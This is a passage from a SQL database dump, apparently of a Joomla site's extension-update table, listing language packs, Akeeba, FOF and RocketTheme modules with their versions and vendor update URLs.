NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3337,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3338,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3339,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(3340,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.5','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3076',''),(3341,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3342,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3343,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3344,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3345,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3346,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3347,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3348,3,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3349,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3350,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3351,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3352,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3353,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3354,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3355,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3356,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3357,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3358,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3359,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3360,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3361,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3362,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3363,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3364,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3365,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3366,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3367,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3368,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3369,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3370,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3371,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3372,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3373,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3374,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3375,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3376,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3377,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3378,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3379,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3380,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3381,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3382,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3383,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3384,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3385,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3386,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3387,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3388,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3389,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3390,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3391,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(3392,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(3393,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(3394,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3395,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3396,57,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3397,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3398,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3399,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3400,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3401,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3402,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3403,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3404,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3405,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3406,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3407,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3408,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3409,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3410,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3411,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3412,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3413,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3414,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3415,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3416,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3417,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3418,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3419,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3420,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3421,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3422,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3423,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3424,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3425,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3426,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3427,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3428,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3429,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3430,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3431,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3432,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3433,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3434,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3435,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3436,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3437,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3438,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3439,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3440,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(3442,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.5','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3076',''),(3443,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3444,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3445,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3446,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3447,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3448,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3449,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3450,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3451,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3452,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3453,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3454,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3455,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3456,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3457,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3458,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3459,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3460,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3461,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3462,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3463,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3464,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3465,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3466,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3467,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3468,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3469,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3470,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3471,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3472,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3473,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3474,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3475,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3476,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3477,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3478,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3479,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3480,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(3481,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3482,1,0,'Joomla','','joomla','file','',0,'3.9.11','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(3483,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3484,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3485,3,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3486,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3487,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3488,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3489,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3490,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3491,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3492,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3493,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3494,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3495,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3496,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3497,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3498,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3499,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3500,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3501,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3502,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(3503,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(3504,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(3505,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(3506,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(3507,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(3508,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(3509,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(3510,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(3511,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(3512,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(3513,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(3514,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(3515,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(3516,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(3517,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(3518,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(3519,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(3520,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(3521,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(3522,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(3523,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(3524,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(3525,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(3526,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(3527,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(3528,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(3529,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(3530,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(3531,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(3532,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(3533,57,0,'French','','pkg_fr-FR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(3534,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(3535,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(3536,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(3537,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(3538,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(3539,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(3540,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(3541,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(3542,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(3543,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(3544,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(3545,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(3546,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(3547,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(3548,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(3549,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(3550,57,0,'Portuguese','','pk